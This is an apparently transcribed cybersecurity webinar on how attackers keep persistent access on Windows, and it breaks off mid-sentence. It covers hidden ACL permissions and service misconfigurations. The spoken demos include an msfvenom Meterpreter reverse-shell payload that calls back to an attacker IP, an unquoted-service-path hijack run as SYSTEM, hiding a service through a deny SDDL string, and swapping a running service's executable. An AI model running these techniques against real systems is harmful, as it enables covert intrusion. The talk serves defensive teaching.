So thank you for joining, and hopefully you guys are ready to start February with some interesting stuff regarding persistence. So first of all, let me briefly introduce myself, and then we are immediately getting into presentation and also demos. If you are there with us as well on the chat and so on, oh hi Roland, nice to see you. Then please tell us where you're from, because let's make it a little bit more alive today. Yeah, so New Year started. Yeah, tell us where you're from in the chat. So there's this public area. Please go ahead and do it. Please also use the Q&A section if you guys would gonna have some questions. So absolutely looking forward to these ones too. Okay, Dallas, thank you. Missouri, oh nice. I wonder whether it's still cold over there or not. Jacksonville, lovely. Vancouver, oh that's a great place. Virginia, San Antonio, oh nice. Montreal, Alberta, that's cool. Cincinnati, Ohio. I'm gonna be, I think, in Ohio in 2 months or something like that. So here we go. Warsaw, yeah, lovely. Hi. And Massachusetts, oh, it's a great place. Montana, Minneapolis, lovely, lovely. So absolutely warm welcome to you guys. Thanks so much for posting this. So now you know who is surrounding you from where and so on. And Roland from Denmark, lovely. Texas, Mexico City, lovely. Yeah, perfect. Thanks a lot for that. Okay, so let's move forward. So as you know, I'm Paula Januszkiewicz, and what I'm simply doing for a living, it's purely cybersecurity. And just simply in short words, basically my background has been always cybersecurity, and for the past like 17, 18 years. And I'm an MVP and also a Microsoft Regional Director, but I'm not working for Microsoft, so I'm the CEO of Secure. This is the company that this year is going to celebrate its 15 years, so sometimes I feel really old being in this industry, but at the same time, with every single incident, I feel super young because every incident brings always something new, and it brings always something that is interesting to learn. Therefore, this is exactly what we're going to be talking about today: incident as well, ways how hackers are becoming persistent. But of course, just to give you also more background, I'm also engaged at various other conferences, for example, this year's RSA. So if you're going to be there, absolutely please come and say hi. I have a technical session over there as well. And for these slides and also for some tools and so on, there's a QR code. So please, if you want, scan it. I'm happy to present it later. But then after this webinar, you guys also gonna receive an email with a recording where we're gonna also add from ourselves a little instruction, so like a lab instruction, that if you want to practice technically what we are doing today as well, then you are gonna also receive that one in the email. So please also await that. So here we go. First of all, whenever we are thinking, of course, about persistent persistence in cybersecurity, it's all about these situations that we are basically, as a hacker, for example, becoming out there in the environment. In a way, we are coming in a way where, for example, we are not really prone to any kind of restarts, disconnections, and so on. So on, they happen, but when the connection is coming back, obviously we are there. So we look at the persistence from many different angles. Yes. So we look at the situation where hackers are sitting out there or making themselves persistence in the customer's network. And during very many incidents that we actually experienced and we supported our customers with, we were experiencing lots of different ways of persistence. And that is exactly what I would love to talk about. Here you get some stats about it. So you can see that, for example, 30 to 65%, 65%, this is a 32 out of all ransomware victims, but 32 paid ransom, only 65% get their data back. So we are dealing with some kind of a code that's there. And that is also quite an interesting stat because I'm thinking here about our customer, where hackers were there sitting for approximately 3 weeks. Nobody saw them, so they had some accounts established, they had some software they were able to remotely connect to, so they were controlling various servers out there. And basically that persistence was not really monitored. And it's not a matter it's like difficult to spot it, it's really about monitoring out there. So that's what we're going to be getting to. And you can see that also 50% of all cyber attacks are actually done on SMBs. Here you got sources. An interesting fact about that is that quite often SMBs they lack some capability in terms of discovery, in terms of monitoring. Therefore, persistence, when we, for example, analyze various situations, is quite often seen there, and hackers can be there in their environments for quite a long time before they are actually discovered. Actually, according to FBI and also independently according to IBM, that persistence is approximately 200 days. So hackers are present in the network before they're actually discovered. And the question is how you are able to hide. What are these tiny little things that you are able to use in order to be persistent? And at the end, how, when we are thinking about discovery, we're able to spot that. So if you want to get more information about persistence itself, I will definitely refer to one great source, which is, of course, attackmeter.org tactics, and that's the TA 0003. And over there, you're going to find all the persistence techniques that could be used. So they are all defined, and it's just a matter of how, of course, we will be able to execute them as a hacker in the environment. So please review the link because that defines us all the different techniques that are out there. So when we are thinking about persistence, going immediately to the content, we've got two types of persistence that we could define over here. One is persistence through misconfiguration. So basically, because something is misconfigured, then we are able to pull it out as a hacker and then we are able to overuse it. For example, as you can see, we might have passwords that are stored in the various config files places. So someone manages to get that password and someone is using this account and then basically becoming persistent. We might have, of course, persistence through misconfiguration of, let's say, services. So, for example, we are able to replace the service executable and then become persistent in that kind of a way. Yes, so we can change actually for the services executable on the fly. And eventually, we get persistence that's used by malware, and there are different techniques that are leveraging more different operating system auto running capabilities. So it's not a misconfiguration that gives us an access, but it's more of a feature of an operating system when we are able to inject ourselves, when we are able to put something out there in order to be loaded, for example, when an operating system runs. And in this case, it's, for example, some couple of example here is listed. That could be, for example, adding entries to the group policy. So every time that group policy is processed, we are wondering how could it be that this thing actually appears in that place. Maybe it's because hacker managed to gain persistence through misconfiguring some entries within the group policy, and that's going to be just returning. Yeah, so this is the flavor here that we are talking about. Or it could be WMI repository. It could be things like particularly admin as the holder. So the domain persistence that allows you to re-add yourself to the domain admins group just because you're going to be there. So it's for good and for bad. That could be your backup plan, at least part of that for the Active Directory compromise. But it could be as well a situation where you are, for example, removing some users, compromised user account from the domain admins group as a part of the mitigation, and then this account actually re-adds itself to the domain admins group, even though upfront it's just a user, and just because it's on a admin SD holder part, then basically you will be able to become privileged again. So that's the point that we are touching base here. Or it could be anything else, yeah, like through Windows mechanisms, so services, task scheduler, and so on. So pretty much anything that's out there when you run outruns. Outruns actually it gives you a pretty nice definition of what's out there in terms of persistence. So whenever we are thinking, of course, about different persistence here, I would like to warm you up a little bit because whenever we are thinking, of course, about that, then that can be done in many different ways. It doesn't have to be, directly leading to a hacker's takeover. It could be rather something small. So, for example, you're not supposed to have access to data but you do have access to data. And the question is, based on what? And I would love to start with a little bit of a warming up demonstration, which is actually related with permissions. And we're going to cover them from three different angles, because I would love to introduce you that sometimes persistence might be about something small. And literally, we had a case of our customer where their data leaked, and they were wondering what kind of channel was out there for that data to leak. And this was kind of their know-how that they were protecting. And it appeared that they thought that someone does not have access to the data, but someone actually had access to the data, and they were wondering how could it be. So here's the thing for you. It's this is a little bit of a warm up, yeah. So it's actually pretty simple demo, but introducing us very much to the subject. So I got over there the text file, and of course, if we get into the text file to the properties, yeah, you can see that. For example, I've got a regular text.txt, but I could also open the advanced security settings. Maybe we should close it for now. So I got a guest account. Guest account is disabled in my system, so please completely ignore that fact. It doesn't matter. But what matters is that guest account particularly has allow and deny selected at the same time. So here we are thinking about the permissions text.txt, and then no inheritance, the purest example on earth. Here we got allow and deny at the same time. So of course, question of the universe is going to be, what do you think? Whether guests would be able to open that text file or not? And just a open question out there. And most of the people would rather say deny. And this is the common knowledge to have, that a deny would override allow. But the problem is that this is such a simple fact that we are learning at school, on some trainings, and so on. But the problem is that in Windows, deny actually does not take precedence. And I know that that might be sometimes surprising, because we might be, and I've seen situations like, of course, people are in IT for like 20 years, and they're like, yeah, for my whole life, I thought that deny actually wins. Well, and why did it work? Because deny is always added last. And what's added last in this purest example out there would win. But let me prove to you that it's actually not winning. So, answer to the question here, do you think that a guest would be or not able to open a file? Should be rather, we don't know, because we don't know what's going to be on the top, allow or deny. Yeah, so that's the thing. So if you go to advanced and then just move to the advanced window here directly, yeah, then in GUI, of course, it's pretty straightforward. We can see allow on the top, deny on the bottom. So we are analyzing this one from the top to the bottom, and top overrides bottom. And to prove that, we go to the effective access, select a user, we go to guest, and then view effective access. As you guys can see, guest can actually open that file. Even though deny is there, it doesn't matter because allow is on the top. Therefore, I'm not that much of a big fan of GUI, fairly, because there's a bunch of things that you will not see here. And this is something that I would love to also prove to you. But long story short, what will be important over there is to see, of course, how these particular permissions look like in terms of PowerShell. So let's give it a try. So what I'm going to do first, I'm going to go to the permissions folder, so the one that this text file was in, and then we're going to do get ACL and then text and then format list. And then you can see, and especially this one in the bottom, security descriptor definition language. Security descriptor sounds like a string that describes security, and that is exactly what that is. So when we look at that string over here, this is nothing but SDDL, where you are able to see that we've got to allow full access local guest, deny full access local guest, allow full access, and then we got WD, which is everyone. If you wonder why WD, it's actually because everyone is world, and world is WD. Yeah, it's kind of funny, but that's what it is. So eventually we are analyzing things from the left to the right, and left it's more important, right is less important. So left overrides right part. And this is also something that we are saying over here. So that's why, even though there is a deny, when we put deny and allow next to each other, deny does not win. Is actually the same. So it's a matter of who is actually higher or more to the left, depending what we checked on the list. So could that be a persistence? In some kind of a way, yes. And that's what I'm talking about, that we are expecting something to happen, but it's something else. And we would normally think that applying the classic theory, in this case, that the user does not have access, but then, ta-da, it does. Yeah. So this is just this little warm-up thing to present. Also, whenever we are thinking about more than items in terms of Windows and permissions and persistence, what I would love to show you is next thing here, which is related with the get ACL for C Windows. And Windows, of course, I mean, it's a classic folder, but it's actually pretty complex. So let me explain a couple of things here and make it a full screen. So first of all, we can see over here that knowing already that this is by the order, we can see here that we've got the last item, which is allow. Then we've got some inheritance stuff. We don't pay attention to it right now. And then we've got GXGR, GXGR. And over there, we've got some number. Yeah, so that SDDL, of course, directly corresponds to what is higher here. And then we got some number. And of course, that number comes from one simple thing, because the permissions, it's a 32-bit access mask. And we are able to really nicely calculate that and prove it. This is minus 161, so let's just put 161. And then we're going to put 0, 6. 736, and you can see that in the calculator, that number, it's a pretty nice number. It's very clean. So for example, here we've got a 32 bits, bring it on, and then we've got two 2 bits selected, 2 bits enabled. So simply this is 2 to the power of 30 because it's bits, and that's 2 to the power of 29. So this one plus that one equals this one. But why there is a minus? Minus actually is because it's a parity bit. So we've got just 2 bits over there, not one. Yeah, so that's the parity bit, and you can just ignore it. Yeah. So long story short, what is interesting is that um, in permissions there's quite a lot going on, and it's easy to ignore something. And let me get to the point. So we just displayed GXGR. That's the generic read and generic execute, or generic execute and read in that order. Generic permissions, it's something very specific in the operating system, and it's not really something that we are able to see in GUI. So could I, for example, have full control but not to see it in GUI? Yeah. And that is exactly what I want to show you. I think the easiest example, full control, is going to be this one, because this one is actually execute and read, so it's kind of longer. But this one is pretty straightforward. So 268 435 446. If you put it in a calculator and you switch it to the programmer's mode, you're going to see that that's going to be 2 to the power of 28 selected, which corresponds with a GA, generic all. How can we see it? Let me show you here first. This is GA and this is FA. So let me just select it in light blue and then enlarge it so that we get it all clear. Please have a look. Let me make it pretty. Yeah, perfect. So this is this trusted installer on the left that we are analyzing. This number, that's 2 to the power of 28, and that's generic all, and it's here. And that full control, it's represented here. Yeah, and that seed, it's a seed of trusted installer, and we have full control, so A. Lovely. And let me display that one in GUI then, because in GUI it is actually quite a challenge. So bring it on. I'm gonna get into the properties of Windows folder. So I'll do it on my side over there. And please have a look. This is Windows. These are the Windows properties, and this is advanced security settings for Windows. So you can see over there that, like on the left, we have 2 times trusted installer. So that's something that starts on the very left in PowerShell underneath with trusted installer here. 2 entries, one GA, another one FA. Yeah, but here we have only one entry mentioned. Yeah, it's not even this. But then in the advanced settings, please have a look, we have only one full control. but there are two full controls. So where on earth, on the right side, there is this G reflected? And answer is it's not. So we could have full control, but not be visible like this. Exactly. That's what I call a really nicely done persistence, because eventually you could be, just a regular user, and eventually you could have an entry added like this. Though the problem is that you cannot add this kind of permissions in GUI. You need to do it, for example, by using ICCLS, or you can do it by using PowerShell, but that security descriptor defines it. Security descriptor is in the face, one-to-one, super clear statement about who has access to this item. But GUI, it's not that great. And it's all about, of course, controlling, assigning access, playing with these descriptors. So if, for example, you have an incident, or if some information leaked, or if you feel like, why that data was accessed by someone it's not supposed to, then just check permissions simply in PowerShell and analyze SDDL to look for that kind of a persistence, and basically to look whether someone actually had access to that item by maybe using the G permission. So the GA, GX, GR, GW. Yeah, so this is the setup. Maybe a little bit advanced, but on the other hand, this is also very, very useful thing to know in terms of understanding how different levels of access could be preserved. And just to summarize what we said so that we can um, get this one checked and then we can move forward, we've got permissions that are in Windows represented like that. So in this format, you can see that the low order 16 bits are actually for the object specific access rights. The next 8 bits are for the standard access rights, which apply, for example, to lots of objects. And these four high order, the most important bits over there, these are the ones that are used to set the generic access rights. That basically, these are the ones that are not really displayed in GUI, as I was explaining. So pretty exciting, yeah? Now, one more thing to demonstrate, because this is the way how these permissions are working. But on the other hand, if, for example, you would want to learn more about that, please observe one thing, that what I'm presenting to you is in orange, because 2 to the power of 28 was GA, 29 GR, GX, so in this order, right? And then the most important that we did not see here actually was a GW, which is a 31. Okay, why this is in orange? Well, because the original picture looks like this. An original picture, unfortunately, is not good. So just saying that whatever you see and whatever the source is, always check it, because at the end that is actually how it is, and that is what we can expect to see in terms of bits. Just saying, yeah. So here we go. So hopefully this is clear. And one more thing to show you in terms of permissions and persistence. Also quite tricky. This one is actually pretty simple, but also very important. Please have a look at one item here. Whenever we specify, and let me show you some example here. Whenever we specify some kind of a folder, so it could be, I'm just going to create some folder on my side. So let me do it right now. And I'm going to call it BT, and then let's go to the properties of it. So that's the one. And if we're going to give it security, so for example, get into advanced over there, yeah, it could be. And then we could, for example, add on the list the permissions for select the principal, let's say guest, whatever. And here we're going to go to the show advanced permissions, and we can actually get into these settings. Let's clear it out so that it's going to be like crystal clear what we are doing over here. You guys can see that at the end, there is actually well, a set of advanced permissions. And long story short, in order to be able to open a file, and that is actually the minimum but needed permission that you could use to open a file, that is for that case actually something that we call a read data. So read data, that's the 2 to the power of 0. So that's the least bit that is actually selected over there. Yeah, so it's gonna be 1. And long story short, this is the only one that we need to open that. So when we think about this, it's not read. Read is not minimal. What is actually minimal is read data, which I'll prove to you in a moment. And when we have it like this and we apply that and we just added guest, please have a look that if we go to guest here, you can see that within the first side, you look at this and you're like, ah, okay, no read, no read. And then you look at the guest, and then you could be like, oh, some special permissions, but at least there's no read, then it's probably something else. I know it's simple, but it's also one of the ways how you are able to hide your permissions. Hide, quote, quote. Because for real, if you're gonna go to special permissions advanced, yeah, you can see that guest can actually open that folder. But for the first moment, we don't see it. Why like that? Because in operating system, read consists of 4 other read types. And that's what we need to know. Read, it's not very singular. It's not like granular type of permission. It actually consists of many more. And in order to prove it, what I have for you, it's here a small thing. If we do calculate the integer value of read, because we know it's a 32-bit access mask, it's not like tiny number. It is actually pretty big. But if we do calculate read data and also let's do read permissions, read attributes, and read extended attributes, oh, maybe too much, here we go, and let's run it. Then basically you can see, guys, that there's like 1, 131, 072, 128, and 8. So again, sorry for the simple math, but just to show you, yeah, so we got a 1 plus 8 plus 128 plus, what is it, 131072. 131072. And then, of course, we end up here with a 131209, which we saw before. This is to prove that read consists of 4 other reads. So read, when you give read, you actually give quite a lot because you give read permissions. Who needs it? Read attributes, read extended attributes. Wow. But for real, we actually need read data. And I'm not saying that we should always assign then from now on read data, but the GUI, that especially shortened version of displaying permissions, kind of makes it tricky. So just be aware that that's also the possibility to hide a little bit ourselves and be able to open files, what at the same time, for the first moment, it doesn't really look like. So that's a little bit of a persistence here. If you have any questions, please, of course, ask them. Hopefully, I'm not running too fast and hopefully all is clear. Yeah. Okay, so that's just a warm up. Now, whenever we are thinking about more of an items over here, then of course, question is, what are the other ways how we are able to gain persistence? And we talked about these mechanisms through services. So I would like to stop there a little bit because services can be misconfigured in so many different ways. Unfortunately, every infrastructure, of course, is very alive, especially in the enterprise. Therefore, these mistakes can easily happen. And the services are the ones that are also very cool and easy and very useful in terms of attacks because there's so many places you can do. For example, you can extract the password from the registry. For example, you can play with permissions to the service and maybe hide yourself. Use the unquoted service path case, which is also quite straightforward, but also very nice to see. And these are the things that basically we can play with. So, long story short, what I would love to show you, it's a bunch of demos related with that, with different flavors really. So one of the flavors, let's start. It's gonna be unquoted service path, and I would have to show you the full path, full situation where we are actually using the unquoted service path in order to check what is going on. And unquoted service path is actually something that you can really nicely really nicely overused. That's why, by the way, vast majority of malware is actually called program.exe uh, or it could be some other strange name.exe. And therefore, what I'm putting right now in the chat, so let me just send it, is two commands. So one is basically a WMIC, and another one starts with the get WMI. Yes, so that's basically. I'm gonna maybe put it all separate. Yes, so that's the first one. Yes, and then basically WMIC, and that's the second one. And these two commands, of course, they do the same thing. But what do? You can use them in order to check simply what kind of services could be misconfigured for yourself in terms of unquoted service path. And let me show you what do we mean by that. So I got over there Windows 10 client, so that's going to be this guy here. And I got some Boba Builder here. It doesn't really matter. So let me just use for that moment an admin because I will need to show you the problem first, and I will need to use an administrative account to demonstrate that. So that's one thing. And the second thing, we're going to use the full setup on the hacker side in order to demonstrate, of course, how that problem looks like. So first, we're going to go to the services MSC. And in the meantime, I'm going to open up the PowerShell ICE. So let's do that as well. Perfect. And you can see over there that I got a CQ service. So while the PowerShell is opening, we can do that. And that CQ service is misconfigured in that kind of way. So it's a C program files, x64, secure services and tools, service.exe. So what's that wrong? Is there anything wrong about that? And answer is absolutely, there is. And let me show you, of course, what that will be. First of all, once we, of course, do the command over there. So this is a little bit of a yeah, copy from the clipboard. Let me just do it once again because there was some issue with that. So maybe we should just do the end concession, and then that would do. And our job is going to be to list service that is, of course, without quotes, that is a possible way of injection. And the problem with unquoted service path, let me, of course, log in and show you, is that SCM, so the manager so services.exe that loads services, is actually loading, unfortunately, the first component from the path. And that's actually quite inconvenient. So at that moment, let's just actually list it. So we got this one, path name not like. And for that moment, we are listing over here, and that's going to give us this actually program files, as you can see, and also pj service good.exe. So that's my service here. Now, why this is wrong, why this is listed? Because in this case, when we have a C program files, what's going to be loaded or tried to be loaded first, it's going to be C program.exe. And if it's not there, then it's going to go to the secure, and then it's going to, oh, there is a space. Try to load services.exe. And if it does not find there, it's going to go to the service.exe. Therefore, what is necessary in our organizations is to check for these misconfigurations. So basically, we can put that into quotes, yeah. And eventually, this particular configuration here, so the C program files and so on, is supposed to be this way. And if you're gonna, with this command that I marked over here, if we're gonna, of course, list a service that is coming as an output, then basically there's gonna be an issue. Yeah, absolutely, Kevin. Here we got. So yeah, so the first thing that is happening, and just to repeat, is that it's trying to find program.exe. I know it's a little silly, but that is exactly what it is, and that's why malware quite often is called program.exe. And you might be wondering why there is a program.exe running, where this is loaded from, what kind of persistence we've got, because this is not defined basically if you open up the services configuration, then it's going to be all good. It's going to be program files and so on. But for some reason, program.exe actually launches. Yeah. So that could be a nice way of achieving persistence too. It's actually pretty straightforward. Yes. But please check your infrastructure for that misconfiguration. And if there are spaces in the name, but there's no quote, that is your potential way of someone being persistent and someone being able to inject things. And right now, let's give it a proof. So what we're gonna do is over there. I've got the Kali box. It doesn't have to be this one, but let's just use this one. And it's over here. Okay, and basically, I've got over there some reverse handler listening, so maybe we can just stop it for now. And we're going to be here listening for the incoming connections on that level. So let's just start another console because I will need to generate a payload that we're going to be using here for that demo. So we're going to use MSF Venom. Let's keep it easy. And minus F exe service. And it's going to be minus P, and the payload's going to be within the type of Windows, Meterpreter, and it's going to be reverse underscore TCP. And for that, it's going to be lhost equals, and in this case, it's our IP, so 110.10.10.10.10.99, and it's going to be on the L port. In this case, 1234. It could be this way, and minus A, and it's going to be the architecture. Let's say 32 bits dash dash plot form platform. Here we go. It's going to be Windows and minus O. Let's call it for now fake service.exe. Enter. Okay, it takes a while, but we're going to generate a simple payload for that. And of course, that's it. So once we are there, we will need to put that one and inject that one on the Windows client. So right now we have generated that one. So let's just do for now Python and minus M, simple HTTP server. So we could, let's say port 8000. So we could simply actually share that part, that file over there. Yeah, so we got this. So let's see whether we will be able to reach it. uh So this is our 10, and so this is HTTP to 10 10 10 99 on port 8000. Yeah, so here we go. So we should get a response. Okay, lovely, we got it. And that's our fake service here. So basically, hacker could potentially, being already there, of course, drop it because we're not talking about how to get in, but more how to establish persistence. Yeah, so here we go. Let's drop it on a desktop for now. Here we go, open folder. And now we're going to inject it, yeah, in a proper way. So we take that fake service, copy, and where do we put it on? In the place we already discussed. So it's going to be in program files, and that's the secure. And then we've got already here a sample. So it's actually 0 kilobyte. It's just a name. So basically, we will need to create and drop an executable that's going to be called this way. So let's just drop it. So here we go. Fake service, 16K. Okay, good. And we're going to name it services.exe because this is exactly how this first part of the folder is called. Yeah, so long story short, that's going to be loaded immediately on the site in here. Yeah, so here we go. So hopefully we got it. And what we're going to do over there, here we are setting up a listener. So we got a listener set up. So L port 1234, L host 10.99, and then basically we are setting this one up. So there's a listener running on the port 1234. And then, as simple as this, the only thing we'll need to do, of course, is on the Windows side, even like restart the operating system, or we can just do start that service, restart that service. It doesn't really matter. Then service can fail. It doesn't matter too, but at least it gives us, for that moment, the possibility to get access to this operating system. Yeah. So why we are anti-authority system? Because this service was running as system, and it could be any service that is misconfigured like this. And most of the services that are in program files, that they are usually privileged. Yeah, so it's going to be C++ program.exe that's going to be loaded, or in this case, C services.exe that is actually loaded. So hopefully this part is clear. Let me know if you have any questions. But just to summarize, it's a simple way of dropping things and simple way of launching things, and then user doesn't really have to do much. You just drop the C program.exe, and then basically upon system restart, if there is some kind of a service that is without quotes but it contains spaces in the name, that's going to be loaded. Yeah, so pretty straightforward, but wanted to show you this one because we can see very often misconfigured on the customer side, and it's simple. Yeah, so here we go. So we got that part. Now the next part that I wanted to show you, it's related with hiding services. And that's also pretty interesting because this is also a very interesting level of persistence. We all know, let me just minimize this and that one, that service, it is a matter of persistence because it's out running every single time we reboot our operating system. And in this case, I got another type of a service, which is called pull as service. And it's just running, yeah, not that much of a big deal. But the thing about that is that here we are able to potentially hide that service by changing permissions to that service. And because today you guys have been already tortured by a little bit of an SDDL at the beginning, then it's a perfect moment to actually introduce SDDL in terms of services. Yeah, so that's what we're gonna do. And the funny part over there is that we can all do it in PowerShell. That's one thing. Second, it's actually pretty easy. So what we're gonna do? First, we're gonna query the service by using the PowerShell get service cmdlet, and that's this one. Let's just take this one off, and we're gonna make it a little larger because there's gonna be quite a lot of stuff going on. So that's the get service and PJ service, and what we are receiving as an output. That's the get service result. So that's the Polar service. I mean, not that much of a big deal. But next thing we're going to do is to change the SDDL string for the service. And technically, as administrators, we normally don't really have to change the SDDL syntax of the service permissions manually. But of course, through a little bit of a manipulation, an attacker can actually hide their presence just like that. And what basically we're going to do is that we're going to make it a service to be almost invisible. But of course, it depends how we're going to look for it. And the SDDL syntax that we're going to introduce over there for the service, it's going to be denying, in this case, the following items. So we've got a DC, LC, WP, DT, and SD. Boom, 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 IU. And that is something that's gonna do the job. Now, if you are wondering what is this about, so what does this actually do, then let me decode it, yeah, because this is basically SDDL for services, which is always a little bit challenging. If you want to play more about that, so let's use it also as a little bit of an inspiration, you can play around and check what the ST command displays. So we get a ST command, and then if we do SC SD security descriptor show for any type of a service, so beats in this case I'm going to do, here you can see that we got two sections, discretionary access control lists and system access control list. And over there, you've got these like single entries. So these are the simply access control lists. And that's the system, that's the building administrators, and so on. Yeah. So these are the different identities that we are using. Yeah. And the IU, it's an interactive user. So that's the interactively logged on user. So this is simply a group identifier that is actually added to the token of the process when, of course, it was logged in interactively. So that is basically applying to all. And long story short, when we look at these different types of permissions that we are able to assign as well, so what does it mean and so on, then basically these permissions are actually pretty straightforward because, for example, here we are denying to delete child, so the DC. Let me enlarge it as well again. So this is this one here. So we are denying to delete child. So simply it's a permission to delete all child objects for the service. We've got simply over here the LC, and LC, by the way, that's the something that we call a service query status. And then basically it means that it's a permission to talk to SCM for the current service status. So if you ask that, oh, hey SCM, service control manager, show me basically all the services and their statuses, here we are denying it. Makes sense to hide, yeah? And then we're going to get into the WP, means to stop the service. So we are not able to stop the service. DT, in this case, that means service pause continue, a permission to pause, resume the service. And then we've got SD, which is basically also a permission to, in this case, we call it a standard delete, to delete the service. So it's in general like denied. Yeah, lots of things here are denied. So we're gonna use this one, yeah, and basically we're gonna assign the permissions by providing actually the SDDL string, and we can do it within the PowerShell, or we can do it as well within the SC command. So it really depends what we're gonna do and what kind of tools. It's very handy for us. But long story short, that's gonna be something that we're gonna use here. Okay, so let me just at that point paste the command because I have that one already written. So we got that. And let me just, of course, use it, run it. And I'm going to also paste this command for you guys in the chat so that you can see exactly what I'm doing. So I'm using here SC set PJ service. Mhm. And we are just specifying here the deny. Yes, so you can see at the very beginning, we've got a D for discretionary access control. So that first D you ignore. And the second D, it's deny. And then it's deny. And then we interactive users, deny, standard users, and like service users. And basically, we've got a deny, building administrators. And then the rest doesn't matter. So, Raymond, you're asking, so is the SD command a way of covering the tracks? It's a way of hiding yourself. So if you are kind of actively covering tracks, yes. So if you want to be persistent but not seen, yeah, SDDL, it's a must. If you are in cybersecurity, if you want to go a little deeper, you need to learn SDDL. 100% because of that reason. But you can also use SDDL to stop antivirus solutions. Not everyone, but some of them, and so on. So it's a very, very useful thing to know. Okay, so what's next? What's next? So the next part over there, it's going to be to play around that service, because here we have set up the permissions, so not that much of a rocket science, but hey, let's see whether that would work. Get service, and then it says cannot find any service with service name PJ service. Hmm? So that's actually pretty strange. So we can also try to use some other methods over there to find the service. So maybe we can just go around a little bit if you don't mind, because here we're going to do, let's say, get service, and we can do show me all of the services. Yes, so select object by the name, and then select, let's say, string, where we're going to do a pattern, and then we can do even a PJ service like this. Yeah, so show me that F8. And then basically, no, nothing. Yeah. So if, for example, we would like to use in general PowerShell, then we will not be able to do it. But for example, we can also do it in a very similar way, like with the SC command, because that's another way. But it's again a matter of how we can find it. Yes. So if we're going to use the SC command, then we can also use the SC query, but I have to run that command this way because in PowerShell SC is not very well processed. So here we go. Then you can see that no, we don't have that kind of a stuff. So long story short, that's the setup. Yeah. Now, for example, whenever we are thinking about the output, then what I would love to show you as well is that we would like to here set up a service maybe that doesn't exist, and for example compare the result. Have a look. set service, that's also interesting, name, and then we're gonna do, I don't know, raccoons. Raccoons are cool. And status, stopped. Okay, so that's the service that does not exist. Yeah, so just for the reference, you see like raccoons are cool was not found on that computer. Okay, so that's kind of a tip over here. Can we do the same story for the PJ service? PJ service, and then let's do F8. And this one, it says cannot be configured due to the following error. Access is denied. Now we are talking. Yeah. So that set service, allowing us to put the status, so stop the service, actually allows us to see that it's hidden. And services in general, by the definition, of course, are placed in the registry. So if you go to the registry, services MS, not the services MSU, but regedit, obviously, and we're going to go to the services MSC, why not? You can also see over there in the place, local machine, system, current control set services, and you're going to go to the PJ service. I mean, it's there. Start type 2, which means automatic. And there is a process good.exe. So of course, we can go to the task manager here or any other better tool like Process Hacker or Process Explorer, and the process is there. It's not hidden. Can we hide the process? Yes, it's actually called decom technique, direct kernel object modification, but it's a little bit more advanced. Yeah, so we could totally do that though, but it's for the quick attack. It's rather difficult, and in terms of persistence, it's also quite difficult, but not impossible. Would the service also be hidden in the services? Mr. Widget is asking. Okay, let me show you. Yeah, obviously. And then PJ service, PJ. Yeah, we don't see it. It's not there. It's not visible. So that's answer. Um, and a nice working script to fix unquoted path. Okay, thanks so much, Roland. That's absolutely great to enumerate the services and so on. So thanks for that resource. And then, Mr. Widget, would this technique also hide the services from tools like Procmon and so on? Good question, uh, because it truly depends. So there are many tools, and it truly depends on what kind of tools we are using here. I want to show you something because I think it's a great question here. Outruns, bring it on. Yep, let's use this version. Why not? Boom, boom. Mm-hmm. And let's go to the services. So bring it on. Yeah, so they're not there yet. So we got a services, and it really depends how we are querying them. How we are querying them, yeah. And also because good.exe, yeah, have a look. Good.exe, it's also a process. Answer to you, Mr. Widget, would be no, this will not be hidden from the Procmon because Procmon will monitor a process, not the service through SCM. So, what's the lesson here is that the more tools we use around different ways to check for the same thing, but in a different way, especially in terms of investigations, the better. And Procmon, of course, if we will ranch it, we can also do it. I love these questions because they bring some more life always to more um, life to the presentation. So you can see here, and let's just reset that. So anything really around the process itself, yeah. So for example, if we're gonna restart the good.exe or something like that, or if I'm gonna crash it and then good.exe is gonna be back again, and all these things here, yeah, then basically the process good.exe was there, but then it wasn't, yeah. So we can of course check whether we can just make some sorting by the process name, why not? But maybe we'll be able to find that one here somewhere. I don't know, but here we go. We get a okay, so SVC host. We can also work on the process name, yeah. So we could create a filter here that would be a process is, for example, good.exe, yeah. So we can specify the process name. Let's just do it. Is actually in this case we're going to give it a good.exe. It's even listed here, yeah. See, so that's actually contains apply and find and bring it on. Yeah, and that's the direct answer to your question. Procmon will see it because it's a process. But my point regarding this persistence is to take you to outruns. It will not show you everything. Yeah, it will not show you, for example, plugins to the third-party browser. Yeah, it will not show you, for example, some plugins to your applications, which could also create some persistence. But it will show you vast majority of things that are considered to be related with persistence, so outrunning. And basically, it's going to show us also our service here. C, so PowerShell, so asking, not really PowerShell itself, but the way how we ask, unfortunately did not work because of the permissions here. But if you run outruns, PJ service, good.exe comes out. Why? Because we go offline to the registry over there. We don't ask anybody. We go directly to the source, and that's just there. Yeah. So that is something that hopefully you guys gonna find useful. Okay, so that's a little bit about persistence and getting, of course, to the summary. I showed you persistence around permissions and also a persistence around services. But of course, there is more than that. Yeah, services, of course, they do store passwords in the registry. I was demonstrating that in the previous Beyond Trust webinar, so please also refer to that. But I was just simply extracting password by using CQ secrets dumper tool. So our tool, for example, in the clear text. GMSA, it's the direct answer to that. But of course, if someone manages to get a password, username and password like this, then that could be potentially used in the attack. So it's more through misconfiguration than any other persistence. Yeah, but we've got even more of the things over here. For example, persistence could be gained by this point number 3, the possibility to rename an executable on the fly. And that is also quite straightforward. So quick demonstration here that if we do have that good.exe basically running, I don't know if it's actually started back again. Oh, okay, it didn't. That's fine. So we can actually go into the C drive where the service is, and it was in a PJ service. And basically, what we can do, we can rename it, yeah, and give it whatever, and take the bad and rename it to good. And not this one, but good. And the point is that whenever we can do it, then of course, unfortunately, Explorer kind of is messed up because it does not display the correct icon right now. But after restarting Explorer, it will be fine. But if the service will be restarted, then in this case, it's going to load the bad stuff. And you can do it on the fly. You don't have to stop the service to rename its executable. And that's also quite interesting. Okay, so hopefully you got an idea about persistence. It's of course not about all of these. It's more. One of the persistence techniques, for example, could be also through domain access. For example, we have a persistence in terms of golden ticket. Yes, so you could have a golden ticket that's going to be valid for 10 years, or you could have, for example, persistence through the API by extracting certificate and always being able to decrypt data in the environment. And this is the last part that I wanted to show you in terms of interesting ways, of course, of persistence, also showing that monitoring of privileged access is actually one of the things to do. So let me get into my demo machine. It's going to be actually quite a short demonstration. Mm, and basically, what's going to be our goal? I mentioned that through that certificate from the domain, you are able to decrypt lots of things in the environment. Yeah. Again, I was demonstrating also how to get access to the certificate from the domain in the previous webinar. So it's actually quite easy. And within our tool, you can do it. But what I would love to demonstrate is how basically we are able, thanks to this, to gain access to the user's key pass. And it's actually quite interesting perspective here because persistence means that we manage to get a certificate that is allowing us to decrypt different encrypted users' data in the environment. But that, of course, includes simply the user's 